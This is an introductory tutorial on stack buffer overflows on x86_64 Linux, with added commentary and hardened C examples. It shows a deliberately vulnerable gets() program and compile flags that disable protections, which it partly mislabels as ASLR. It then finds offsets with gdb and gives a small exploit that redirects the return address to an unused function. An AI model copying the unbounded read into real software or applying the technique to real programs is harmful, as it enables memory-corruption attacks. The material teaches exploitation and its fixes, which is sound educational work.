Tutorial: Basic Buffer Overflow

September 1, 2015 | Views: 4284


Hey guys, today I will give you a brief introduction to buffer overflows on Linux x86_64 machines.
So, let's start with a basic example in C.
First some standard includes; you should know them…

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// the page does not show the read call; gets() is assumed as the classic unbounded read
// (newer libcs no longer declare it, so the prototype is given explicitly)
char *gets(char *s);

// we create a vulnerable function
char *vulnFunction(int a, int b)
{
    // it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!
    char Buffer1[125];

    // now we get some input that could be greater than the buffer
    gets(Buffer1);

    // and a pointer to the buffer will be returned
    return strdup(Buffer1);
}

int main()
{
    // main's body is not shown on the page; it has to call vulnFunction for the overflow to happen
    char *copy = vulnFunction(1, 2);
    printf("%s\n", copy);
    free(copy);
    return 0;
}

// This will never be called…
void Unused()
{
    // body not shown on the page; a message makes it visible when it does run
    printf("Unused() was reached\n");
}
Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack
-zexecstack is to change the read & write mode of the stack to executable
-fno-stack-protector is for simplicity; it disables the randomization of the stack
(called address space layout randomization = ASLR)
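Before going on to the overflow itself, here is the bounds-checked version of the same function, added as an example and not part of the original tutorial (read_line_bounded, safeFunction, run_on_line and the constructed inputs are mine). The two compiler flags above remove GCC's stack-smashing protector (-fno-stack-protector turns off the canary check) and make the stack executable; ASLR itself is a kernel setting rather than a compiler flag, and the real fix is independent of all three: stop the write from leaving the buffer. fgets bounded by sizeof Buffer1 does that. The edge case worth handling is an overlong line, whose remainder fgets leaves in the stream, so the helper drains it and reports the truncation. A tmpfile stands in for stdin so the code runs offline with the 220-byte line from the perl command below.

```c
/* Added example (not from the tutorial): a bounds-checked replacement for
 * vulnFunction. Function names and the constructed test inputs are mine. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER1_SIZE 125   /* same declared size as the tutorial's Buffer1 */

/* Read one line into dst, never more than dstsize-1 characters plus the NUL.
 * An overlong line is the edge case: fgets leaves the rest of it in the
 * stream, so we drain it (it must not bleed into the next read) and report
 * the truncation. Returns 1 if a line was read, 0 on EOF with no data. */
int read_line_bounded(FILE *in, char *dst, size_t dstsize, int *truncated)
{
    *truncated = 0;
    if (dstsize == 0 || fgets(dst, (int)dstsize, in) == NULL)
        return 0;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';           /* whole line fit; drop the newline */
        return 1;
    }
    int c = fgetc(in);                 /* what follows the characters we kept? */
    if (c == EOF || c == '\n')
        return 1;                      /* line fit exactly, or ended at EOF */
    *truncated = 1;                    /* more characters were pending */
    while (c != '\n' && c != EOF)      /* discard the rest of the line */
        c = fgetc(in);
    return 1;
}

/* Plain malloc+copy so the example does not depend on strdup's feature macros. */
char *copy_string(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p) memcpy(p, s, n);
    return p;
}

/* Hardened counterpart of vulnFunction: same 125-byte stack buffer, but the
 * read is bounded by sizeof Buffer1. Returns a heap copy (caller frees) or
 * NULL when there was nothing to read. */
char *safeFunction(FILE *in, int *truncated)
{
    char Buffer1[BUFFER1_SIZE];
    if (!read_line_bounded(in, Buffer1, sizeof Buffer1, truncated))
        return NULL;
    return copy_string(Buffer1);
}

/* Feed safeFunction a constructed line of n 'A's (like perl -e 'print "A"x220')
 * through a temporary file standing in for stdin. Returns the length of the
 * copy produced, or (size_t)-1 on error; *truncated reports dropped input. */
size_t run_on_line(size_t n, int *truncated)
{
    size_t copied = (size_t)-1;
    FILE *in = tmpfile();
    if (!in) return copied;
    for (size_t i = 0; i < n; i++)
        fputc('A', in);
    fputc('\n', in);
    rewind(in);
    char *copy = safeFunction(in, truncated);
    fclose(in);
    if (copy) { copied = strlen(copy); free(copy); }
    return copied;
}

size_t copied_len_for(size_t n) { int t = 0; return run_on_line(n, &t); }
int truncated_for(size_t n)    { int t = 0; run_on_line(n, &t); return t; }

int main(void)
{
    const size_t lengths[] = { 10, 124, 125, 220 };   /* constructed inputs */
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("%3zu 'A's -> kept %zu bytes, truncated=%d\n", lengths[i],
               copied_len_for(lengths[i]), truncated_for(lengths[i]));
    return 0;
}
```

In the tutorial's program the equivalent one-line change is `fgets(Buffer1, sizeof Buffer1, stdin)` in place of the unbounded read: the 220-byte input is cut at 124 characters and the saved rbp and return address are never touched. Had the program been built with the default stack protector, the same overflow would instead have been caught at run time by the canary check, which aborts the process rather than returning into Unused.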

Q: So, what happens if we give an input greater than the buffer?
A: It overwrites everything from the beginning of the buffer up to the buffer's start address plus the length of the input.

Let’s try it out:
perl -e 'print "A"x220' | ./first_vuln    # too much input…
Yeah, it crashes….
Now we start gdb to find some values:
gdb -q ./first_vuln
Disassemble the Unused function to get its start address
disas Unused

Now, you should search for something like this
Dump of assembler code for function Unused:
   0x000000000040061c <+0>:	push   %rbp    // this will be the new return address…

The stack is built like this (lowest address first):

  Buffer1         128 bytes (125 declared, padded to 128)
  rbp register    8 bytes (the saved rbp)
  return address  8 bytes (the saved rip)

Ok, we have our info. We need 128 bytes for the buffer and 8 for the rbp register. After that, the rip begins.
We need to overwrite the complete buffer and the rbp register and append a new return address…
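To make the layout above and the earlier answer about what gets overwritten concrete, here is a small model of the vulnFunction frame in C. It is an added example, not code from the tutorial; the struct, the function names and the 16-byte stack alignment are my assumptions about how gcc -O0 lays out this frame on x86_64 (rounding to 8, as the tutorial says, gives the same 128 for a 125-byte buffer). It reproduces the offsets found with gdb (128 to the saved rbp, 136 to the return address) and classifies how far an input of a given length reaches, counting the NUL that gets() appends.

```c
/* Added example (not from the tutorial): a model of the vulnFunction frame
 * that reproduces the offsets found with gdb and shows which part of the
 * frame an input of a given length overwrites. Struct/function names and the
 * 16-byte alignment are assumptions about gcc -O0 on x86_64. */
#include <stddef.h>
#include <stdio.h>

struct frame_layout {
    size_t buffer_decl;    /* declared buffer size: 125 in the tutorial */
    size_t buffer_slot;    /* size after stack alignment: 128 */
    size_t saved_rbp_off;  /* offset of the saved rbp from the buffer start */
    size_t ret_addr_off;   /* offset of the saved return address (rip) */
};

enum reach {
    REACH_INSIDE,     /* stays within the declared 125 bytes */
    REACH_PADDING,    /* spills into the alignment padding only */
    REACH_SAVED_RBP,  /* clobbers the saved rbp */
    REACH_RET_ADDR,   /* clobbers the return address: control-flow hijack */
    REACH_BEYOND      /* runs past the frame into the caller's frame */
};

/* Round n up to a multiple of align (align must be a power of two). */
static size_t align_up(size_t n, size_t align)
{
    return (n + align - 1) & ~(align - 1);
}

/* Buffer rounded up to the slot size, then 8 bytes of saved rbp, then the
 * 8-byte return address. Assumes Buffer1 sits directly below the saved rbp
 * with no other locals in between, which is what the tutorial observed. */
struct frame_layout layout_for(size_t buffer_decl, size_t align)
{
    struct frame_layout f;
    f.buffer_decl = buffer_decl;
    f.buffer_slot = align_up(buffer_decl, align);
    f.saved_rbp_off = f.buffer_slot;
    f.ret_addr_off = f.buffer_slot + 8;
    return f;
}

/* Where does the last byte of an n-byte write starting at Buffer1 land? */
enum reach reach_of_write(const struct frame_layout *f, size_t n)
{
    if (n <= f->buffer_decl)       return REACH_INSIDE;
    if (n <= f->buffer_slot)       return REACH_PADDING;
    if (n <= f->saved_rbp_off + 8) return REACH_SAVED_RBP;
    if (n <= f->ret_addr_off + 8)  return REACH_RET_ADDR;
    return REACH_BEYOND;
}

/* gets() stores the input plus a terminating NUL: len chars write len+1 bytes. */
size_t bytes_written_by_gets(size_t input_len)
{
    return input_len + 1;
}

/* Convenience wrappers used by the demo below. */
size_t ret_addr_offset_for(size_t buffer_decl, size_t align)
{
    return layout_for(buffer_decl, align).ret_addr_off;
}

enum reach reach_for(size_t buffer_decl, size_t align, size_t input_len)
{
    struct frame_layout f = layout_for(buffer_decl, align);
    return reach_of_write(&f, bytes_written_by_gets(input_len));
}

int main(void)
{
    static const char *names[] = { "inside buffer", "padding", "saved rbp",
                                   "return address", "beyond the frame" };
    const size_t lengths[] = { 100, 127, 128, 135, 140, 220 }; /* constructed inputs */
    struct frame_layout f = layout_for(125, 16);
    printf("buffer slot %zu, saved rbp at +%zu, return address at +%zu\n",
           f.buffer_slot, f.saved_rbp_off, f.ret_addr_off);
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("%3zu input chars -> %s\n", lengths[i],
               names[reach_for(125, 16, lengths[i])]);
    return 0;
}
```

The model also explains a detail of the tutorial's numbers: 136 bytes of filler land exactly on the return address slot, and the NUL that gets() appends after a 4-byte address value falls on byte 140, the low end of the upper half of that slot, which is already zero for a non-PIE binary loaded at 0x400000. Any input of 128 characters or more (129 bytes with the NUL) already corrupts the saved rbp, which is the condition a stack canary placed between the buffer and the saved registers is designed to detect.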


#include <stdio.h>

int main(void)
{
    int i = 0;
    // 34 x 4 bytes = 136 bytes of filler: 128 for Buffer1 + 8 for the saved rbp
    // (the loop body is not shown on the page; a 4-byte filler is assumed from 34 * 4 = 136)
    for (i = 0; i < 34; i++)
        fwrite("AAAA", 1, 4, stdout);

    // the new return address: the start of Unused() found with gdb
    unsigned RIP = 0x000000000040061c;
    // written as raw little-endian bytes; the upper 4 bytes of the saved address are already 0
    fwrite(&RIP, sizeof(RIP), 1, stdout);

    return 0;
}

Simply compile the exploit and run it like this:
./first_exploit | ./first_vuln


Have fun, and maybe you should read some more tutorials on buffer overflows.




1 Comment
  1. In this example you are just redirecting execution flow to the hacked print function, right?
